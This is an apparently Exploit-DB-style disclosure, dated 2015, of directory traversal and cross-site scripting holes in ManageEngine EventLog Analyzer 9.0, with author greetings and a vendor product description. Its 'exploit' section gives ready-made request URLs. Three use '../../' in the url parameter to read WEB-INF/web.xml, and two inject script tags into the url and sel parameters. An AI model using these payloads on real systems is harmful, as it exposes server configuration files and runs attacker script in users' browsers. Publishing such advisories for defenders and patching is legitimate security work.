ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting

EDB-ID:

35910

CVE:





Platform:

JSP

Date:

2015-01-26


 ################################################################################################
 #                                                                                              #
 #    ...:::::ManageEngine EventLog Analyzer Directory Traversal/XSS  Vulnerabilities::::....   #         
 # #############################################################################################


                                  Sobhan System Network & Security Group (sobhansys)
								      
-------------------------------------------------------
# Date: 2015-01-24
# Exploit Author: AmirHadi Yazdani (Sobhansys Co)
# Vendor Homepage: http://www.manageengine.com/products/eventlog/
# Demo Link: http://demo.eventloganalyzer.com/event/index3.do
#Affected version: <= Build Version  : 9.0

About ManageEngine EventLog Analyzer (From Vendor Site) :									  
EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market.
Using this Log Analyzer software, organizations can automate 
the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting,
and archiving from one central location. 
This event log analyzer software helps to monitor file integrity, conduct log forensics analysis,
monitor privileged users and comply to different compliance regulatory bodies
by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more.
--------------------------------------------------------

									  
I'M hadihadi From Virangar Security Team

special tnx to:MR.nosrati,black.shadowes,MR.hesy
& all virangar members & all hackerz

greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei

spl:Z.Khodaee

-------
exploit:

Diretory Traversal :

http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?completeData=true&helpP=archiveAction&tab=system&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13&tab=system&url=../../WEB-INF/web.xml%3f

XSS :

http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=userReport'%22()%26%25<ahy><ScRiPt%20>prompt(915375)</ScRiPt>
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13'%22()%26%25<ahy><ScRiPt%20>prompt(978138)</ScRiPt>&tab=system&url=ConfigureTemplate


----
Sobhan system Co.
Signal Network And Security Group (www.signal-net.net)

E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net